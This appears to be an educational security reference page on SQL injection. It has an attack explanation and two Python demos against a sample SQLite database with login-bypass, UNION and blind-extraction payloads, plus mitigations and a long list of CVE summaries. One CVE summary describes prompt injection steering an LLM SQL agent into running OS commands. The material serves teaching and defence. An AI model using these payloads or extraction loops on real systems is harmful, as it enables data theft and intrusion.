
SQL Injection

web HIGH

SQL injection exploits the way applications construct database queries by mixing user input directly into SQL statements.

How It Works

The root cause is query construction by string concatenation. When an application pastes untrusted input into SQL text instead of passing it to the driver as data, a quote character in the input closes the string literal the developer intended and everything after it is parsed as SQL, so the attacker controls the query's logic. A login form that builds SELECT * FROM users WHERE username='input' AND password='input' will, given the password ' OR '1'='1, run a WHERE clause that is true for every row: the database returns user records without any password having matched, and the application logs the attacker in.

Attackers follow a methodical process. They first probe input fields with characters that carry meaning in SQL, such as single quotes, semicolons or comment sequences, and watch for database errors, changed output or altered response times that show the input reached a query. Once injection is confirmed they escalate: UNION-based payloads merge rows from other tables into the application's own result set, other payloads modify or delete records, and queries against the database's metadata tables enumerate schemas, tables and columns. Blind variants work without visible errors or returned data. Boolean-based injection infers one bit per request from a difference in application behavior, and time-based injection calls the database's sleep or delay function so that a measurable response delay confirms the condition under test.

Advanced scenarios include second-order injection, where malicious input is stored harmlessly at first and only becomes live when the application later reads it back and builds a new query from it, and out-of-band attacks that exfiltrate data through DNS lookups or HTTP requests issued by the database server when results cannot be read directly. Some database systems let an attacker extend the compromise from the database to the host: SQL Server's xp_cmdshell and PostgreSQL's COPY ... FROM PROGRAM execute operating system commands, and MySQL's LOAD_FILE and SELECT ... INTO OUTFILE read and write server files, which can be used to plant a web shell. In every case the privileges of the database account set the ceiling on what the injection can do, which is why the least-privilege mitigation below matters.
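The concatenation flaw, the login bypass, UNION extraction and boolean-based blind inference described above, worked end to end in Python against an in-memory SQLite database. This is an added example, not code from the page or from any product it lists; the users table and its two accounts are constructed sample data, and the comment sequence `--` is SQLite's line comment (MySQL requires a trailing space after `--`, or `#`).

```python
import sqlite3
import string

# Constructed sample data: a throwaway in-memory SQLite users table standing
# in for the application's real database.
SAMPLE_USERS = [
    ("admin", "s3cret", "administrator"),
    ("alice", "hunter2", "user"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        SAMPLE_USERS,
    )
    return conn


def login_vulnerable(conn, username, password):
    """Deliberately vulnerable: untrusted input is concatenated into the SQL
    text, so a quote in the input ends the string literal and the remainder
    is parsed as SQL."""
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Parameterized: the SQL text is fixed and the driver passes the values
    separately, so the same payloads are compared as literal strings."""
    sql = "SELECT username, role FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchall()


def user_exists_vulnerable(conn, username) -> bool:
    """A blind oracle: the attacker sees only 'found' or 'not found'."""
    sql = f"SELECT 1 FROM users WHERE username='{username}'"
    return conn.execute(sql).fetchone() is not None


def blind_extract_password(conn, target, alphabet=string.ascii_lowercase + string.digits):
    """Boolean-based blind extraction: each probe asks whether character `pos`
    of the target's password equals `c` and learns one bit from the oracle."""
    recovered = ""
    while True:
        pos = len(recovered) + 1
        for c in alphabet:
            probe = f"{target}' AND substr(password,{pos},1)='{c}' --"
            if user_exists_vulnerable(conn, probe):
                recovered += c
                break
        else:
            return recovered  # no character matched: the string has ended


def demo():
    conn = make_db()
    return {
        # password='' OR '1'='1' is true for every row: all users come back
        "bypass": login_vulnerable(conn, "nobody", "' OR '1'='1"),
        # UNION pulls the password column into the result set; '--' comments
        # out the rest of the original query
        "union": login_vulnerable(conn, "' UNION SELECT password, role FROM users --", ""),
        # the same payload against the parameterized query matches nothing
        "safe": login_safe(conn, "nobody", "' OR '1'='1"),
        "blind": blind_extract_password(conn, "admin"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The blind loop is the part worth studying: it never sees a password in a response, only whether a row came back, yet it recovers the column one character at a time with a fixed number of requests per position. Against a real target the oracle would be an HTTP status, a page-length difference or a response delay instead of `fetchone()`.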

Impact

  • Complete data breach — extraction of entire database contents including credentials, personal information, and proprietary data
  • Authentication bypass — logging in as any user without knowing passwords
  • Data manipulation — unauthorized modification or deletion of critical records
  • Privilege escalation — granting administrative rights to attacker-controlled accounts
  • Remote code execution — leveraging database features to run operating system commands and compromise the underlying server
  • Lateral movement — using compromised database credentials to access other connected systems

Real-World Examples

FreePBX's CVE-2025-66039 demonstrated a complete attack chain: SQL injection across 11 parameters in four different endpoints allowed attackers to write rows into the cron_jobs table, and when the system's scheduler ran those entries the attacker-supplied commands executed on the host, granting full server control. The vulnerability required no authentication, so it was exploitable by anyone who could reach the affected endpoints.

E-commerce platforms have suffered massive breaches through shopping cart SQL injection, where attackers inserted skimming code into stored procedures that executed during checkout, harvesting credit card data from thousands of transactions. Healthcare systems have been compromised through patient portal vulnerabilities, exposing millions of medical records when attackers injected UNION queries to merge data from supposedly isolated tables.

Mitigation

  • Parameterized queries (prepared statements) — the SQL text is fixed and every user-supplied value is handed to the driver as a bound parameter, so input is never parsed as SQL. Binding covers values only: table and column names, ORDER BY columns and sort direction cannot be parameters and must be checked against an allow-list of expected identifiers before they are placed in the query (several of the plugin CVEs below are exactly an unvalidated order_by parameter)
  • Object-Relational Mapping (ORM) frameworks — generate parameterized SQL for ordinary operations, but every ORM also exposes raw-query or expression escape hatches that concatenate strings; review those call sites as carefully as hand-written SQL
  • Strict input validation — allow-list acceptable characters, lengths and formats and reject everything else; this is defense in depth rather than a substitute for parameterization, since rejecting "suspicious patterns" is a blocklist that encodings and alternative syntax routinely bypass
  • Least privilege database accounts — the application should connect with a role that holds only the permissions its queries need, with no file-system, command-execution (xp_cmdshell, COPY FROM PROGRAM) or superuser rights, so that an injection cannot escalate to the host
  • Web Application Firewall (WAF) — detects and blocks common injection patterns as a secondary layer; it raises attacker cost but is bypassable and must not be the only control
  • Database activity monitoring — alerts on unusual query shapes from the application account, such as sudden UNION or metadata-table access, repeated sleep or delay calls, and privilege changes
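The identifier caveat in the parameterization bullet deserves a worked example, because the fix that works for values silently fails there. The Python below is added here as an example and is not code from the page or any project it lists; it uses an in-memory SQLite database with constructed products and users tables to show an injectable ORDER BY, the one-bit oracle an attacker builds from it without any error or extra data, why binding the column name as a parameter is not a fix, and the allow-list check that is. ALLOWED_SORT_COLUMNS is an assumed application setting.

```python
import sqlite3

# Assumption: the only columns the application intends to expose for sorting.
ALLOWED_SORT_COLUMNS = {"id", "name", "price"}

# Constructed sample data: products the endpoint sorts, plus a users table an
# attacker would want to read through the injection.
PRODUCTS = [(1, "widget", 9.5), (2, "anvil", 50.0), (3, "bolt", 0.25)]
USERS = [("admin", "s3cret")]
BY_NAME = [(2, "anvil", 50.0), (3, "bolt", 0.25), (1, "widget", 9.5)]
BY_PRICE = [(3, "bolt", 0.25), (1, "widget", 9.5), (2, "anvil", 50.0)]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def list_products_vulnerable(conn, order_by):
    """Deliberately vulnerable: the sort column is pasted into the SQL text."""
    sql = f"SELECT id, name, price FROM products ORDER BY {order_by}"
    return conn.execute(sql).fetchall()


def list_products_bound(conn, order_by):
    """Looks fixed but is not: a bound parameter in ORDER BY is a string
    constant, so every row gets the same sort key and nothing is sorted."""
    sql = "SELECT id, name, price FROM products ORDER BY ?"
    return conn.execute(sql, (order_by,)).fetchall()


def list_products_safe(conn, order_by, direction="ASC"):
    """Allow-list the identifier and the direction, then quote the identifier;
    only a value the application itself chose ever reaches the SQL text."""
    if order_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {order_by!r}")
    direction = direction.upper()
    if direction not in ("ASC", "DESC"):
        raise ValueError(f"unsupported sort direction: {direction!r}")
    sql = f'SELECT id, name, price FROM products ORDER BY "{order_by}" {direction}'
    return conn.execute(sql).fetchall()


def order_by_oracle(conn, condition):
    """What an attacker does with an injectable ORDER BY: make the sort key
    depend on a condition and read one bit from which row order comes back.
    No error and no extra column are needed, only the order of normal rows."""
    payload = f"(CASE WHEN ({condition}) THEN name ELSE price END)"
    return list_products_vulnerable(conn, payload) == BY_NAME


def demo():
    conn = make_db()
    first_char_is = "(SELECT substr(password, 1, 1) FROM users WHERE username='admin') = '{}'"
    return {
        # True: the admin password starts with 's', learned from sort order alone
        "leak_s": order_by_oracle(conn, first_char_is.format("s")),
        "leak_x": order_by_oracle(conn, first_char_is.format("x")),
        # binding the column name does not sort by price at all
        "bound_sorted": list_products_bound(conn, "price") == BY_PRICE,
        "safe": list_products_safe(conn, "price"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The allow-list is deliberately a set of exact column names rather than a character filter: a regex that permits only letters would still accept an injected subquery in databases where identifiers and expressions overlap, and it would never catch a direction string like `ASC; DROP TABLE users`. Repeating the oracle call in a loop over positions and an alphabet, as in the earlier login example, turns this single bit into the full column.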

Recent CVEs (5427)

EPSS 0% CVSS 6.5
MEDIUM This Month

Time-based blind SQL injection in the Photo Gallery by 10Web WordPress plugin (all versions through 1.8.40) allows authenticated attackers holding contributor-level access or above to exfiltrate sensitive database contents by embedding a crafted shortcode in a post or draft. The `order_by` parameter is passed unsanitized into existing SQL queries, and the injected payload executes when the shortcode is rendered - targeting WordPress databases containing credentials, user PII, and site configuration. No public exploit code or CISA KEV listing has been identified at time of analysis, though the high confidentiality impact and low attack complexity make this a meaningful risk on any site with non-administrative contributors.

WordPress SQLi
NVD
EPSS 0% CVSS 7.5
HIGH This Week

Time-based blind SQL injection in the Simply Schedule Appointments WordPress plugin (versions up to and including 1.6.11.8) allows unauthenticated remote attackers to extract sensitive database contents through the 'append_where_sql' parameter on the /appointments/bulk REST endpoint. The endpoint's permission check accepts a public nonce embedded in the booking widget's frontend JavaScript, and a PUT request with a urlencoded body bypasses the plugin's blocklist by preventing PHP from populating the relevant superglobals. No public exploit identified at time of analysis, though Wordfence has documented the technique in detail.

WordPress SQLi
NVD
EPSS 0% CVSS 8.1
HIGH This Week

Arbitrary file deletion in the WP Contact Form 7 DB Handler WordPress plugin (versions up to and including 3.0) can be achieved by chaining CSRF, UNION-based SQL injection, and PHP object deserialization. A remote unauthenticated attacker who lures a logged-in administrator to a malicious page can delete arbitrary server files, including wp-config.php, which typically forces the site into a re-installation state and enables full site takeover. No public exploit identified at time of analysis, though Wordfence's detailed write-up effectively documents the exploit chain.

PHP WordPress Path Traversal +3
NVD
MEDIUM PATCH This Month

SQL injection in Symfony's PdoAdapter cache component allows any caller who can influence the `$prefix` argument to `AbstractAdapterTrait::clear()` to inject arbitrary SQL into a DELETE statement, potentially deleting unintended rows from the cache table or reshaping query semantics. Affected versions span symfony/cache across four maintained branches: below 5.4.52, 6.x below 6.4.40, 7.x below 7.4.12, and 8.x below 8.0.12. No public exploit has been identified at time of analysis and the CVE is not listed in CISA KEV, but vendor-released patches are available across all affected branches.

SQLi
NVD GitHub
CVSS 9.8
CRITICAL PATCH Act Now

Remote code execution in Langroid before 0.63.0 arises because its SQLChatAgent executes SQL text generated by an LLM, and that LLM is steerable through prompt injection — including indirect injection via data returned from the database into the model's context. When the agent connects with a database role holding code-execution or filesystem privileges, an attacker who shapes the agent's input can drive emission of dialect-specific primitives like PostgreSQL's COPY ... FROM PROGRAM to run OS commands on the database host. A full working proof-of-concept (Base64-smuggled COPY FROM PROGRAM running 'id') is published in the GitHub advisory; there is no entry in CISA KEV, so this reflects publicly available exploit code rather than confirmed active exploitation.

RCE Python Information Disclosure +2
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Unauthenticated SQL injection in Pi.Alert (a WiFi/LAN intruder detection and web-service monitoring tool by leiweibau) lets remote attackers manipulate backend database queries through the public devices.php endpoint. The flaw affects builds from 2024-06-29 up to the 2026-05-07 fix, and the CVSS 4.0 vector (AV:N/AC:L/PR:N/UI:N) confirms it is trivially reachable over the network with no authentication or user interaction, while the high-confidentiality / no-integrity / no-availability impact (VC:H/VI:N/VA:N) indicates the primary risk is database disclosure. There is no public exploit identified at time of analysis and it is not listed in CISA KEV; no EPSS score was provided in the source data.

PHP SQLi
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM This Month

SQL injection in uzy-ssm-mall v1.1.0 exposes sensitive database information to unauthenticated remote attackers via unsanitized input passed through the ProductMapper.xml MyBatis mapper and OrderUtil.java components. The vulnerability requires no authentication or user interaction, making it trivially automatable according to the SSVC framework. No public exploit identified at time of analysis, and EPSS sits at 0.04% (12th percentile), indicating low current exploitation pressure despite the permissive attack surface.

Java SQLi
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM This Month

Authentication bypass via SQL injection in OpenRapid RapidCMS v1.3.1 allows unauthenticated remote attackers to manipulate the application's authentication logic by injecting crafted SQL payloads into the `name` cookie parameter processed by the `/template/default/menu.php` component. The CVSS 6.5 (AV:N/AC:L/PR:N/UI:N) score reflects trivial remote exploitability with no prior authentication required, though the confidentiality and integrity impacts are rated Low and availability is unaffected. A public researcher writeup is linked in references, suggesting exploit techniques are documented, but no confirmed active exploitation (CISA KEV) has been recorded and EPSS sits at 0.03% (11th percentile), indicating low observed exploitation activity at time of analysis.

PHP Authentication Bypass SQLi
NVD
CVSS 8.0
HIGH PATCH This Week

PHP object injection in Pimcore (packages pimcore/pimcore and admin-ui-classic-bundle) up to and including version 12.3.6 arises from six code paths calling unserialize() without the allowed_classes restriction on values read from database columns and filesystem files. An attacker who can already write to one of those sources - for example through SQL injection into the tmp_store, sites, or custom_layouts tables, or a file write to the WebDAV delete log - can plant a serialized PHP gadget chain that executes arbitrary code with web-server privileges once the data is deserialized. No public exploit identified at time of analysis (the vendor advisory documents only a conceptual PoC procedure), the CVE is not in CISA KEV, and EPSS is not provided; the issue is fixed in 12.3.7 and rated CVSS 8.0, with the High attack-complexity reflecting its dependence on a separate write primitive and a working gadget chain.

PHP RCE SQLi +1
NVD GitHub
EPSS 0% CVSS 8.5
HIGH This Week

Blind SQL injection in the WordPress plugin Duplicate Page and Post (by Arjun Thakur) through version 2.9.5 lets authenticated low-privilege users inject crafted SQL into a database query, enabling extraction of arbitrary database contents including WordPress user hashes and secrets. The CVSS:3.1 base score is 8.5 with a changed scope, reflecting impact beyond the plugin into the shared WordPress database. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV; it was reported through the Patchstack research program.

SQLi
NVD VulDB
EPSS 0% CVSS 6.8
MEDIUM PATCH This Month

Privilege escalation in PostgreSQL Anonymizer (all versions prior to 3.1.0) allows an authenticated database user to gain superuser privileges by embedding malicious SQL code within a column identifier of a user-created table. When a superuser invokes the k-anonymity function against such a table, the injected code executes with superuser-level privileges, yielding full confidentiality, integrity, and availability impact across the database. No active exploitation has been confirmed (not in CISA KEV) and no public exploit code has been identified at time of analysis, though SSVC rates technical impact as total due to the complete privilege escalation outcome.

SQLi PostgreSQL
NVD
EPSS 0% CVSS 9.3
CRITICAL Act Now

Blind SQL injection in the RealMag777 "Active Products Tables for WooCommerce" WordPress plugin (all versions up to and including 1.0.9) allows remote unauthenticated attackers to inject SQL into backend database queries and infer sensitive data through boolean or time-based responses. The CVSS 3.1 vector (PR:N/UI:N) indicates exploitation requires no authentication or user interaction, and the changed scope (S:C) reflects that compromise of the WordPress database can affect the entire site beyond the plugin itself. There is no public exploit identified at time of analysis, and no KEV listing or EPSS score was provided.

WordPress SQLi
NVD
EPSS 0% CVSS 9.3
CRITICAL Act Now

Unauthenticated blind SQL injection in the RealMag777 TableOn (posts-table-filterable) WordPress plugin through version 1.0.5.1 lets remote attackers inject crafted SQL into backend queries without credentials or user interaction. Because the CVSS scope is marked changed (S:C) with high confidentiality impact, a successful attack can read data beyond the vulnerable component, including the WordPress database. No public exploit is identified at time of analysis, and the EPSS score is very low (0.03%, 9th percentile), indicating no current sign of widespread exploitation despite the 9.3 base score.

SQLi
NVD
EPSS 0% CVSS 9.3
CRITICAL Act Now

Blind SQL injection in the Easy Form Builder WordPress plugin (by hassantafreshi), affecting all versions up to and including 4.0.6, lets remote unauthenticated attackers inject crafted SQL into backend database queries. With a CVSS of 9.3 and a scope-changed vector, a successful attack can read sensitive data across the database and impact availability. There is no public exploit identified at time of analysis, and the EPSS score is very low (0.03%, 9th percentile), indicating no observed mass exploitation yet despite the high severity rating.

SQLi
NVD
EPSS 0% CVSS 9.3
CRITICAL Act Now

Blind SQL injection in the Tainacan WordPress plugin (versions up to and including 1.0.3) lets remote unauthenticated attackers inject crafted SQL into backend database queries. The CVSS vector (AV:N/AC:L/PR:N/UI:N) indicates exploitation requires no authentication or user interaction, and the changed scope plus high confidentiality impact drive the 9.3 score. There is no public exploit identified at the time of analysis and the issue is not listed in CISA KEV, but the low attack complexity and unauthenticated reach make it a high-priority patch candidate.

SQLi
NVD
EPSS 0% CVSS 8.5
HIGH This Week

Blind SQL injection in the Stylemix MasterStudy LMS WordPress plugin (all versions through 3.7.29) lets authenticated low-privilege users inject crafted SQL into a backend database query, enabling extraction of arbitrary database contents including user credentials and configuration secrets. The CVSS 8.5 (scope-changed) rating reflects that a successful injection can reach data beyond the plugin's own scope, i.e. the entire shared WordPress database. There is no public exploit identified at time of analysis and EPSS is very low (0.03%, 9th percentile), but the network-reachable, low-complexity nature of the flaw makes it a meaningful risk for sites that grant accounts to students or instructors.

SQLi
NVD
EPSS 0% CVSS 9.3
CRITICAL Act Now

Blind SQL injection in the RealMag777 'Active Products Tables for WooCommerce' WordPress plugin (versions up to and including 1.0.8) lets remote attackers inject SQL commands via an unsanitized parameter to read arbitrary data from the WordPress/WooCommerce database. The CVSS vector (AV:N/AC:L/PR:N/UI:N) indicates unauthenticated network exploitation with a changed scope, meaning the injection reaches the backend database beyond the plugin component itself. There is no public exploit identified at time of analysis and no EPSS score was provided, so probability of exploitation cannot be quantified from the available data.

WordPress SQLi
NVD
EPSS 0% CVSS 8.7
HIGH This Week

Unauthenticated SQL injection in mbCONNECT24 and the related MB connect line / Helmholz remote-maintenance portals (myREX24V2, myREX24V2.virtual, mymbCONNECT24) version 2.20.0 and earlier lets a remote attacker reach the getAccountData function and inject crafted input into its SQL SELECT statement. Because authentication is not required, an attacker can read arbitrary database contents, resulting in total loss of confidentiality, though integrity and availability are unaffected. There is no public exploit identified at time of analysis and EPSS is very low (0.05%, 15th percentile), so widespread opportunistic exploitation has not yet materialized despite the high CVSS 4.0 base score of 8.7.

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in the mbCONNECT24 and myREX24V2 industrial remote-access portals (all variants at or below version 2.20.0) lets a low-privileged remote attacker read arbitrary database contents through the user_alarmprofile view, which fails to neutralize special characters in a SQL SELECT statement (CWE-89). Reported to CERT@VDE and tracked as VDE-2026-044/EUVD-2026-32148, the flaw causes total loss of confidentiality but does not affect integrity or availability. There is no public exploit identified at time of analysis, and EPSS scores it at the 11th percentile (0.03%).

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in the tag view of MB connect line's mbCONNECT24 and myREX24 remote-maintenance platforms (all variants through 2.20.0) lets a remote attacker manipulate a SQL SELECT statement to read arbitrary database contents, yielding a total loss of confidentiality (VC:H, with no integrity or availability impact). The CVSS 4.0 vector requires low privileges (PR:L), yet the description labels the flaw 'unauthenticated' - a discrepancy defenders should resolve against the vendor advisory before scoping risk. No public exploit is identified at time of analysis, EPSS is very low (0.03%, 11th percentile), and CISA's SSVC framework marks current exploitation as none.

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in the system_tag view of the mbCONNECT24 family of industrial remote-maintenance portals (mbCONNECT24, mymbCONNECT24, myREX24V2 and myREX24V2.virtual) versions 0.0.0 through 2.20.0 lets a remote attacker manipulate a SQL SELECT statement and read arbitrary database contents, yielding a total loss of confidentiality (CVSS 4.0 7.1, VC:H). The CVSS vector indicates a low-privileged account is required (PR:L), though the description text describes the flaw as 'unauthenticated' - this discrepancy should be verified with the vendor. There is no public exploit identified at time of analysis, and EPSS is very low (0.03%, 11th percentile), consistent with CISA SSVC scoring exploitation as 'none.'

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in MB connect line's mbCONNECT24/myREX24V2 industrial remote-maintenance portals (all versions up to and including 2.20.0) lets a low-privileged authenticated user read arbitrary database contents through the 'system view', where special characters are not neutralized inside a SQL SELECT command, yielding a total loss of confidentiality (CVSS 4.0 base 7.1). No public exploit is identified at time of analysis and the issue is not listed in CISA KEV; EPSS is very low at 0.03% (11th percentile), indicating limited near-term mass-exploitation likelihood. The flaw was reported by CERT@VDE and is tracked under advisory VDE-2026-044 and ENISA EUVD-2026-32145. Note the description calls it 'unauthenticated' while the CVSS vector specifies PR:L (low-privileged), a discrepancy that should be resolved with the vendor.

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in the devices_configuration view of MB connect line / Red Lion mbCONNECT24 and myREX24V2 remote-maintenance platforms (versions up to and including 2.20.0) lets a low-privileged remote user read arbitrary database contents. The CVSS 4.0 vector scores it 7.1 with high confidentiality impact and no integrity or availability impact, while EPSS rates exploitation probability at only 0.03% (11th percentile). No public exploit is identified at time of analysis and the issue is not in CISA KEV.

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in the dashboard view of MB connect line's remote-maintenance portals (mbCONNECT24, mymbCONNECT24, myREX24V2 and myREX24V2.virtual) lets a remote, low-privileged user inject crafted input into a SQL SELECT statement, yielding a total loss of confidentiality of the backend database. All versions up to and including 2.20.0 are affected. There is no public exploit identified at time of analysis and EPSS is very low (0.03%, 11th percentile), but the network-reachable, low-complexity nature of the flaw in internet-facing OT remote-access gateways warrants prompt remediation.

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in the alarming view of MB connect line's remote-maintenance platforms - mbCONNECT24, mymbCONNECT24, and the myREX24V2/myREX24V2.virtual portals up to and including version 2.20.0 - lets a remote, low-privileged user smuggle crafted input into a SQL SELECT statement and read arbitrary database contents, resulting in total loss of confidentiality. The CVSS 4.0 vector (PR:L) indicates a low-privileged account is required, even though the advisory text calls the flaw 'unauthenticated' - a discrepancy worth verifying. No public exploit identified at time of analysis, and EPSS is very low (0.03%, 11th percentile), so this is a credible but not actively exploited issue.

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in MB connect line's remote-maintenance portals — mbCONNECT24, mymbCONNECT24, and the myREX24V2 / myREX24V2.virtual cloud variants (all versions up to and including 2.20.0) — lets a low-privileged remote attacker manipulate a SQL SELECT statement in the getWidgetTags function and read arbitrary database contents, causing a total loss of confidentiality. The flaw is confidentiality-only (no integrity or availability impact) and carries a CVSS 4.0 base score of 7.1. EPSS is very low (0.03%, 11th percentile) and CISA's SSVC framework rates exploitation as 'none'; there is no public exploit identified at time of analysis and it is not on CISA KEV.

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in the getProjectTags function of MB connect line's remote-maintenance platforms - mbCONNECT24, myREX24V2, mymbCONNECT24 and the myREX24V2.virtual appliance, all versions up to and including 2.20.0 - lets a remote attacker manipulate a backend SQL SELECT statement and read arbitrary database contents, causing a total loss of confidentiality (CVSS 4.0 base 7.1, VC:H with no integrity or availability impact). The flaw was coordinated through CERT@VDE and catalogued in the ENISA EUVD; there is no public exploit identified at time of analysis and the EPSS probability is very low (0.03%, 11th percentile). Note a source conflict on access level: the description calls the attacker 'unauthenticated' while the CVSS vector specifies PR:L (low-privilege authenticated).

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in the VerifyCreateLicences function of MB connect line's mbCONNECT24 / myREX24 remote-maintenance platforms (including the myREX24V2.virtual and mymbCONNECT24 variants, versions up to and including 2.20.0) lets a remote attacker holding a low-privilege account inject crafted input into a SQL SELECT statement and read arbitrary database contents, causing total loss of confidentiality. The CVSS 4.0 base score is 7.1 with high confidentiality impact but no integrity or availability impact. There is no public exploit identified at time of analysis, and EPSS rates exploitation probability very low at 0.03% (11th percentile).

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in the getComponentScalings function of MB connect line's mbCONNECT24/myREX24V2 remote-maintenance platforms (all variants at version 2.20.0 and earlier) lets a remote attacker manipulate a backend SQL SELECT statement to read arbitrary database contents, causing a total loss of confidentiality. The flaw was reported by CERT@VDE (advisory VDE-2026-044, EUVD-2026-32138) and the CVSS 4.0 vector indicates the attacker holds at least a low-privilege account (PR:L), although the description text confusingly also calls it 'unauthenticated.' No public exploit identified at time of analysis, and EPSS is very low at 0.03% (11th percentile), indicating no observed mass-exploitation interest.

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in the mbCONNECT24 industrial remote-access platform (and the sibling products myREX24V2, myREX24V2.virtual and mymbCONNECT24, all versions up to and including 2.20.0) lets a remote attacker abuse the getDeviceScalings function, where user input is concatenated into a SQL SELECT statement without proper neutralization (CWE-89). Successful injection yields a total loss of confidentiality, allowing extraction of arbitrary database contents, though integrity and availability are unaffected per the CVSS 4.0 vector (VC:H/VI:N/VA:N, score 7.1). There is no public exploit identified at time of analysis, and EPSS is very low at 0.03% (11th percentile).

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Confidential data disclosure via SQL injection affects the mbCONNECT24 industrial remote-maintenance platform and its related variants (mymbCONNECT24, myREX24V2, myREX24V2.virtual) at versions up to and including 2.20.0. The flaw lives in the getProjectScalings function, where attacker-controlled input reaches a SQL SELECT statement, allowing extraction of arbitrary database contents and a total loss of confidentiality (CVSS 4.0 base 7.1, VC:H). The CVSS vector requires low-privilege access (PR:L), which conflicts with the description's claim of an 'unauthenticated' attack - a discrepancy defenders should resolve against the vendor advisory. There is no public exploit identified at time of analysis, and EPSS is very low (0.03%, 11th percentile), with CISA SSVC rating exploitation as 'none'.

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in MB connect line's remote-maintenance platforms - mbCONNECT24, myREX24V2, myREX24V2.virtual and mymbCONNECT24 at versions up to and including 2.20.0 - lets a low-privileged remote attacker manipulate the SQL DELETE command in the 'inmessage' model to read the entire backend database and delete rows from a non-critical table. The flaw yields full confidentiality loss and partial integrity loss but no availability impact, and is rated CVSS 4.0 7.1. EPSS is very low (0.03%, 11th percentile), there is no public exploit identified at time of analysis, and it is not on CISA KEV.

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in the MB connect line mbCONNECT24 / myREX24 family of industrial remote-maintenance gateways (all listed editions through 2.20.0) lets a low-privileged remote user feed crafted input into a SQL SELECT statement assembled by the saveObjectFromData function, exposing the full backend database for reading. Reported by CERT@VDE (advisory VDE-2026-044, EUVD-2026-32134), the issue is a confidentiality-only impact (CVSS 4.0 base 7.1, VC:H/VI:N/VA:N). No public exploit code and no CISA KEV listing exist at this time, and EPSS is very low (0.03%, 11th percentile), indicating no observed mass exploitation.

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in the saveDashboardLayout function of dash_layout.php in MB connect line's mbCONNECT24, mymbCONNECT24, myREX24V2 and myREX24V2.virtual remote-access platforms (all versions up to and including 2.20.0) lets a low-privileged remote attacker manipulate a SQL INSERT statement to read the entire backend database and write rows into a non-critical table. The flaw, reported by CERT@VDE (VDE-2026-044, EUVD-2026-32133), yields total loss of confidentiality and partial loss of integrity but no availability impact. EPSS is very low (0.03%, 11th percentile) and there is no public exploit identified at time of analysis, so this is a serious data-exposure bug rather than a mass-exploitation threat.

PHP SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in the saveDashboardLayout function of dash.php affects the mbCONNECT24, myREX24V2, mymbCONNECT24, and myREX24V2.virtual industrial remote-maintenance platforms in versions up to and including 2.20.0. Because user-supplied input is improperly neutralized inside a SQL INSERT statement, a remote attacker can read the entire backend database and write rows into a non-critical table, yielding full loss of confidentiality and partial loss of integrity. There is no public exploit identified at time of analysis and EPSS exploitation probability is very low (0.03%, 11th percentile).

PHP SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

SQL injection in the getDevicegroups function of MB connect line / Red Lion industrial remote-access products (mbCONNECT24, myREX24V2 and their hosted mymbCONNECT24 / myREX24V2.virtual variants, all versions up to and including 2.20.0) lets a low-privileged remote user inject crafted input into a SQL SELECT statement and read arbitrary database contents, yielding a total loss of confidentiality (CVSS 4.0 base 7.1, VC:H, VI:N, VA:N). The issue was reported by CERT@VDE and published as advisory VDE-2026-044 / EUVD-2026-32161; no public exploit has been identified and EPSS is very low (0.03%, 11th percentile), indicating no observed widespread exploitation. Note a source discrepancy: the description labels the flaw 'unauthenticated' while the CVSS vector requires low privileges (PR:L) - this should be verified with the vendor.

SQLi
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Information disclosure via SQL injection affects the Easy View feature of MB connect line's remote-maintenance portals (mbCONNECT24, mymbCONNECT24, myREX24V2, and myREX24V2.virtual) in versions up to and including 2.20.0. A remote attacker holding a low-privileged account can inject crafted input into a SQL SELECT statement to read arbitrary database contents, resulting in total loss of confidentiality. There is no public exploit identified at time of analysis, and the EPSS score is very low (0.03%, 11th percentile), indicating no observed widespread exploitation activity.

SQLi
NVD
EPSS 0% CVSS 7.0
HIGH This Week

